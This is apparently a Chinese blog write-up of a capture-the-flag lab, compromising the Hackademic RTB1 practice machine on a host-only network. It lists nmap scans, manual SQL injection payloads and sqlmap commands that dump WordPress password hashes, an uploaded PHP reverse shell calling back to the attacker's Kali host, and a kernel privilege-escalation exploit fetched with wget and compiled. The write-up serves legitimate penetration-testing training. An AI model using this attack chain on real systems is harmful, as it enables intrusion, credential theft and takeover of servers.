第二次打靶
靶机介绍:1)靶机名称:2-Free-Hackademic.RTB1
2)靶机链接:
步骤:链接:https://pan.baidu.com/s/1IMWhKd3h8sDcPelzXXhxKg提取码:o5k0
打靶过程:
1)启动靶机,选择网络模式为仅主机模式,由此可确定靶机地址段为192.168.56.0/24
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124001920774-906007840.png
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124001937446-99952703.png
2)通过nmap进行扫描,扫描192.168.56.0/24存活主机
#nmap -sP 192.168.56.0/24https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124001954295-1806807645.png
通过扫描,确认靶机地址为192.168.56.104
3)使用nmap扫描该IP开放的所有端口
#nmap -p- 192.168.56.104https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002008380-1056390475.png
扫描发现,开放80端口
4)对每80端口进行工作服务的指纹扫描(应用服务版本信息等)
#nmap -p80 -sV -sC 192.168.56.104https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002029516-1027616793.png
5)访问web页面
http://192.168.56.104/https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002046899-417743433.png
6)点击标题“Hackademic_RTB1”,出现如下页面
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002123340-745867172.png
7)点击Got root,发现地址栏参数发生变化,http://192.168.56.104/Hackademic_RTB1/?p=9
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002154635-2109123293.png
8)对该URL进行SQL注入测试,判断是否存在SQL注入漏洞
http://192.168.56.104/Hackademic_RTB1/?p=9
http://192.168.56.104/Hackademic_RTB1/?p=9'页面无明显变化,说明此处无SQL注入漏洞
9)点击上述页面最下方的“Uncategorized”发现,URL中的参数发生了变化
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002213750-1475439669.png
10)对上述URL进行SQL注入测试,页面发生了变化,说明存在SQL注入漏洞
http://192.168.56.104/Hackademic_RTB1/?cat=1
http://192.168.56.104/Hackademic_RTB1/?cat=1'https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002239664-610071726.png
11)手动测试
http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=1
http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=2
http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=1 order by 5
http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=1 order by 6
http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=2 union select 1,2,3,4,5
http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=2 union select 1,databases(),3,4,5
http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=2 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()
http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=2 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name='wp_users'12)SQLmap自动注入
①检测数据库类型,证明是否存在sql注入漏洞
# sqlmap -u "http://192.168.56.104/Hackademic_RTB1/?cat=1" --batchhttps://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002301550-863480861.png
②获取数据库
# sqlmap -u "http://192.168.56.104/Hackademic_RTB1/?cat=1" --dbms=MySQL--dbs --batchhttps://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002317754-1286997576.png
③获取wordpress数据库中的数据表
#sqlmap -u "http://192.168.56.104/Hackademic_RTB1/?cat=1" --dbms=MySQL-D "wordpress" --tables --batchhttps://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002349614-1303154268.png
④获取wp_users表中的所有字段
#sqlmap -u "http://192.168.56.104/Hackademic_RTB1/?cat=1" --dbms=MySQL-D "wordpress" -T "wp_users" --columns --batchhttps://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002411021-1772334676.png
⑤获取user_login和user_pass中的数据
#sqlmap -u "http://192.168.56.104/Hackademic_RTB1/?cat=1" --dbms=MySQL-D "wordpress" -T "wp_users" -C user_login,user_pass --dump --batchhttps://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002429299-1664783867.png
13)最后一个用户JohnSmith的user_pass通过md5进行了加密,可以对其进行破解
https://md5.gromweb.com/https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002448779-345674608.png
14)通过dirserach对网站目录进行扫描,查看是否可以扫描出web站点的后台管理页面
# dirsearch -u "http://192.168.56.104"
# dirsearch -u "http://192.168.56.104/Hackademic_RTB1/"https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002503117-1851627820.png
15)通过访问扫描出的目录,发现了web站点后台地址
http://192.168.56.104/Hackademic_RTB1/wp-admin/https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002521570-2094065096.png
16)通过SQL注入出来的用户“GeorgeMiller”登入后台后,配置其可以上传的文件类型有php,并点击更新配置
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002535847-1951904404.png
17)上一步配置完成,后生成一个upload选线,运行上传PHP文件
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002549071-1018988017.png
18)下载PHP反弹shell脚本文件,并在upLoad页面进行上传
#php反弹shell脚本文件下载地址
https://pentestmonkey.net/tools/web-shells/php-reverse-shell下载完成后,设置脚本中IP地址为kali主机地址(192.168.56.103)
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002605181-1413974803.png
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002618405-903602268.png
上传成功后,返回如下页面及地址:href='/Hackademic_RTB1/wp-content/reverse.php
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002631857-1497489893.png
19)在Kali主机通过nc监听脚本中设置的端口(1234),并在浏览器访问刚才上传的php脚本文件
#nc -lvvp 1234
浏览器访问:http://192.168.56.104/Hackademic_RTB1/wp-content/reverse.phphttps://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002655001-1572483894.png
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002708074-1297311988.png
此时已经成功反弹shell
20)查看当前用户是否具有sudo权限,提示必须要有一个控制终端
$sudo -shttps://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002721808-1396261869.png
21)查看当前主机内核为2.6.31
$uname -ahttps://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002742626-1802050960.png
22)在kali主机搜索2.6.31内核对应的本地权限提示脚本
#searchsploit 2.6.3|grep -i "local privilege escalation"https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002755673-999854514.png
23)将选定的提权脚本复制到Kali本机站点目录下,并启动httpd服务
# cp /usr/share/exploitdb/exploits/linux/local/15285.c /var/www/html
# systemctl restart apache224)在反弹shell成功后的主机,将上述脚本下载下来
$ cd /tmp
$ wget http://192.168.56.103/15285.chttps://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002817950-794535491.png
25)通过gcc编译
$ gcc -o exp 15285.c
$ ls
$ chmod +x exphttps://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002830763-531519296.png
26)获取flag
#cd /root
#ls
#cat key.txthttps://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002848395-1845960631.png
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页:
[1]